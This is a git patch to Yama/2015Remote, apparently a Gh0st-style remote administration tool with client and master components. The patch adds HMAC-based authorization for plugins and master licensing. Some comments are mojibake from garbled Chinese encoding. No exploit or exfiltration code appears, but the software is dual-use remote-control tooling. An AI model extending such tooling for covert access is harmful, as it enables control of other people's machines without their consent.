From 2e1a5156e9fb60bf27642cc70a3a205044ac6d80 Mon Sep 17 00:00:00 2001
From: yuanyuanxiang <962914132@qq.com>
Date: Sat, 28 Jun 2025 04:03:06 +0800
Subject: [PATCH] Security: Improve the authorization of plugins

---
 client/KernelManager.cpp            |  6 +++++-
 client/LoginServer.cpp              |  4 ++++
 common/commands.h                   |  9 ++++++---
 server/2015Remote/2015RemoteDlg.cpp | 27 +++++++++++++++++++++++++--
 server/2015Remote/CPasswordDlg.cpp  |  5 +++++
 server/2015Remote/CPasswordDlg.h    |  2 ++
 server/2015Remote/pwd_gen.cpp       |  8 ++++++++
 server/2015Remote/pwd_gen.h         |  2 ++
 8 files changed, 57 insertions(+), 6 deletions(-)
diff --git a/client/KernelManager.cpp b/client/KernelManager.cpp
index 21c0026..7759f70 100644
--- a/client/KernelManager.cpp
+++ b/client/KernelManager.cpp
@@ -220,8 +220,10 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 	case CMD_AUTHORIZATION: {
 		HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "MASTER.EXE");
 		hMutex = hMutex ? hMutex : OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE");
+#ifndef _DEBUG
 		if (hMutex == NULL) // Ã»ÓÐ»¥³âÁ¿£¬Ö÷³ÌÐò¿ÉÄÜÎ´ÔËÐÐ
 			break;
+#endif
 		CloseHandle(hMutex);
 
 		char buf[100] = {}, *passCode = buf + 5;
@@ -234,8 +236,10 @@ VOID CKernelManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
 			memcpy(buf + 32, pwdHash, 64);						// 64×Ö½Ú
 			m_ClientObject->Send2Server((char*)buf, sizeof(buf));
 		} else {
+			int* days = (int*)(buf + 1);
 			config* cfg = pwdHash == masterHash ? new config : new iniFile;
-			cfg->SetStr("settings", "Password", passCode);
+			cfg->SetStr("settings", "Password", *days <= 0 ? "" : passCode);
+			cfg->SetStr("settings", "HMAC", *days <= 0 ? "" : buf + 64);
 			delete cfg;
 			g_bExit = S_SERVER_EXIT;
 		}
diff --git a/client/LoginServer.cpp b/client/LoginServer.cpp
index 2d058e3..083ead4 100644
--- a/client/LoginServer.cpp
+++ b/client/LoginServer.cpp
@@ -266,7 +266,11 @@ LOGIN_INFOR GetLoginInfo(DWORD dwSpeed, const CONNECT_ADDRESS& conn)
 	std::string masterHash(skCrypt(MASTER_HASH));
 	HANDLE hMutex = OpenMutex(SYNCHRONIZE, FALSE, "MASTER.EXE");
 	hMutex = hMutex ? hMutex : OpenMutex(SYNCHRONIZE, FALSE, "YAMA.EXE");
+#ifndef _DEBUG
 	if (hMutex != NULL) {
+#else
+		{
+#endif
 		CloseHandle(hMutex);
 		config*cfg = conn.pwdHash == masterHash ? new config : new iniFile;
 		str = cfg->GetStr("settings", "Password", "");
diff --git a/common/commands.h b/common/commands.h
index 717bd05..832f548 100644
--- a/common/commands.h
+++ b/common/commands.h
@@ -11,6 +11,8 @@
 #include <chrono>
 
 #ifdef _WIN32
+#define WIN32_LEAN_AND_MEAN
+#include <windows.h>
 #include <concrt.h>
 #include <corecrt_io.h>
 #define MVirtualFree(a1, a2, a3) VirtualFree(a1, a2, a3)
@@ -580,7 +582,7 @@ struct ThreadInfo
 	CONNECT_ADDRESS* conn;
 	ThreadInfo() : run(1), h(NULL), p(NULL), user(NULL), conn(NULL) { }
 	void Exit(int wait_sec = 15) {
-		run = FALSE;
+		run = 0;
 		for (int count = 0; p && count++ < wait_sec; Sleep(1000));
 #ifdef _WIN32
 		if (p) TerminateThread(h, 0x20250626);
@@ -808,8 +810,8 @@ typedef struct Validation {
 	char To[20];			// ½áÊøÈÕÆÚ
 	char Admin[100];		// ¹ÜÀíÔ±µØÖ·£¨µ±Ç°Ö÷¿ØµÄ¹«ÍøµØÖ·£©
 	int Port;				// ¹ÜÀíÔ±¶Ë¿Ú£¨Ä¬ÈÏµ±Ç°¶Ë¿Ú£©
-	char Reserved[16];		// Ô¤Áô×Ö¶Î
-	Validation(float days, const char* admin, int port) {
+	char Checksum[16];		// Ô¤Áô×Ö¶Î
+	Validation(float days, const char* admin, int port, const char* id="") {
 		time_t from = time(NULL), to = from + time_t(86400 * days);
 		memset(this, 0, sizeof(Validation));
 		std::string fromStr = ToPekingTimeAsString(&from);
@@ -818,6 +820,7 @@ typedef struct Validation {
 		strcpy_s(To, toStr.c_str());
 		strcpy_s(Admin, admin);
 		Port = port;
+		if(strlen(id))memcpy(Checksum, id, 16);
 	}
 	bool IsValid() const {
 		std::string now = ToPekingTimeAsString(NULL);
diff --git a/server/2015Remote/2015RemoteDlg.cpp b/server/2015Remote/2015RemoteDlg.cpp
index aa0d049..c56c39b 100644
--- a/server/2015Remote/2015RemoteDlg.cpp
+++ b/server/2015Remote/2015RemoteDlg.cpp
@@ -232,8 +232,11 @@ DllInfo* ReadPluginDll(const std::string& filename) {
 	std::string masterHash(skCrypt(MASTER_HASH));
 	int offset = MemoryFind((char*)buffer + 1 + sizeof(DllExecuteInfo), masterHash.c_str(), fileSize, masterHash.length());
 	if (offset != -1) {
-		std::string masterId = GetPwdHash();
+		std::string masterId = GetPwdHash(), hmac = GetHMAC();
+		if(hmac.empty())
+			hmac = THIS_CFG.GetStr("settings", "HMAC");
 		memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo)+offset, masterId.c_str(), masterId.length());
+		memcpy((char*)buffer + 1 + sizeof(DllExecuteInfo) + offset + masterId.length(), hmac.c_str(), hmac.length());
 	}
 
 	// è®¾ç½®è¾“å‡ºå‚æ•°
@@ -732,6 +735,15 @@ BOOL CMy2015RemoteDlg::OnInitDialog()
 		OnMainExit();
 		return FALSE;
 	}
+	if (GetPwdHash() == std::string(skCrypt(MASTER_HASH))) {
+		auto pass = THIS_CFG.GetStr("settings", "superAdmin");
+		if (hashSHA256(pass) == GetPwdHash()) {
+			m_superPass = pass;
+		} else {
+			THIS_CFG.SetStr("settings", "superAdmin", "");
+		}
+	}
+
 	// å°†â€œå…³äºŽ...â€èœå•é¡¹æ·»åŠ åˆ°ç³»ç»Ÿèœå•ä¸­ã€‚
 	SetWindowText(_T("Yama"));
 	LoadFromFile(m_ClientMap, GetDbPath());
@@ -952,7 +964,13 @@ void CMy2015RemoteDlg::OnTimer(UINT_PTR nIDEvent)
 	if (nIDEvent == TIMER_CHECK)
 	{
 		if (!m_superPass.empty()) {
+			Mprintf(">>> Timer is killed <<<\n");
 			KillTimer(nIDEvent);
+			std::string masterHash = std::string(skCrypt(MASTER_HASH));
+			if (GetPwdHash() == masterHash) {
+				THIS_CFG.SetStr("settings", "superAdmin", m_superPass);
+				THIS_CFG.SetStr("settings", "HMAC", genHMAC(masterHash, m_superPass));
+			}
 			return;
 		}
 		if (!CheckValid(-1)) 
@@ -1795,11 +1813,15 @@ VOID CMy2015RemoteDlg::MessageHandle(CONTEXT_OBJECT* ContextObject)
 		int *days = (int*)(resp+1);
 		if (devId[0] == 0 || pwdHash[0] == 0)break;
 		// å¯†ç å½¢å¼ï¼š20250209 - 20350209: SHA256
+		std::string hash = pwdHash;
 		std::string password = getDateStr(0) + " - " + getDateStr(*days) + ": " + pwdHash;
 		std::string finalKey = deriveKey(password, devId);
 		std::string fixedKey = getDateStr(0) + std::string("-") + getDateStr(*days) + std::string("-") + getFixedLengthID(finalKey);
 		memcpy(devId, fixedKey.c_str(), fixedKey.length());
 		devId[fixedKey.length()] = 0;
+		std::string hmac = genHMAC(hash, m_superPass);
+		memcpy(resp + 64, hmac.c_str(), hmac.length());
+		resp[80] = 0;
 		m_iocpServer->OnClientPreSending(ContextObject, (LPBYTE)resp, sizeof(resp));
 		break;
 	}
@@ -2762,7 +2784,8 @@ void CMy2015RemoteDlg::OnToolGenMaster()
 		}
 	}
 	int port = THIS_CFG.GetInt("settings", "ghost");
-	Validation verify(atof(days.m_str), master.c_str(), port<=0 ? 6543 : port);
+	std::string id = genHMAC(pwdHash, m_superPass);
+	Validation verify(atof(days.m_str), master.c_str(), port<=0 ? 6543 : port, id.c_str());
 	if (!WritePwdHash(curEXE + iOffset, pwdHash, verify)) {
 		MessageBox("å†™å…¥å“ˆå¸Œå¤±è´¥! æ— æ³•ç”Ÿæˆä¸»æŽ§ã€‚", "é”™è¯¯", MB_ICONWARNING);
 		SAFE_DELETE_ARRAY(curEXE);
diff --git a/server/2015Remote/CPasswordDlg.cpp b/server/2015Remote/CPasswordDlg.cpp
index d3409a0..8b0b845 100644
--- a/server/2015Remote/CPasswordDlg.cpp
+++ b/server/2015Remote/CPasswordDlg.cpp
@@ -29,6 +29,11 @@ std::string GetMasterId() {
 	return id;
 }
 
+std::string GetHMAC(int offset) {
+	const Validation * v= (Validation*)(g_MasterID + offset);
+	return v->Checksum;
+}
+
 extern "C" void shrink64to32(const char* input64, char* output32);  // output32 å¿…é¡»è‡³å°‘ 33 å­—èŠ‚
 
 extern "C" void shrink32to4(const char* input32, char* output4);    // output4 å¿…é¡»è‡³å°‘ 5 å­—èŠ‚
diff --git a/server/2015Remote/CPasswordDlg.h b/server/2015Remote/CPasswordDlg.h
index e2a0192..239ac0b 100644
--- a/server/2015Remote/CPasswordDlg.h
+++ b/server/2015Remote/CPasswordDlg.h
@@ -16,6 +16,8 @@ const Validation* GetValidation(int offset=100);
 
 std::string GetMasterId();
 
+std::string GetHMAC(int offset=100);
+
 bool IsPwdHashValid(const char* pwdHash = nullptr);
 
 bool WritePwdHash(char* target, const std::string& pwdHash, const Validation &verify);
diff --git a/server/2015Remote/pwd_gen.cpp b/server/2015Remote/pwd_gen.cpp
index 6be4b71..f7a2e14 100644
--- a/server/2015Remote/pwd_gen.cpp
+++ b/server/2015Remote/pwd_gen.cpp
@@ -120,6 +120,14 @@ std::string hashSHA256(const std::string& data) {
 	return result.str();
 }
 
+std::string genHMAC(const std::string& pwdHash, const std::string& superPass) {
+	std::string key = hashSHA256(superPass);
+	std::vector<std::string> list({ "g","h","o","s","t" });
+	for (int i = 0; i < list.size(); ++i)
+		key = hashSHA256(key + " - " + list.at(i));
+	return hashSHA256(pwdHash + " - " + key).substr(0, 16);
+}
+
 // Éú³É 16 ×Ö·ûµÄÎ¨Ò»Éè±¸ ID
 std::string getFixedLengthID(const std::string& hash) {
 	return hash.substr(0, 4) + "-" + hash.substr(4, 4) + "-" + hash.substr(8, 4) + "-" + hash.substr(12, 4);
diff --git a/server/2015Remote/pwd_gen.h b/server/2015Remote/pwd_gen.h
index ef3f30f..bddf4bb 100644
--- a/server/2015Remote/pwd_gen.h
+++ b/server/2015Remote/pwd_gen.h
@@ -9,6 +9,8 @@ std::string getHardwareID();
 
 std::string hashSHA256(const std::string& data);
 
+std::string genHMAC(const std::string& pwdHash, const std::string& superPass);
+
 std::string getFixedLengthID(const std::string& hash);
 
 std::string deriveKey(const std::string& password, const std::string& hardwareID);
